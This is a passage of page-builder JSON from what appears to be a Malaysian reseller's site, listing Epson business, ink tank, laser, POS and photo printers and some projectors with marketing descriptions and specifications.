glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 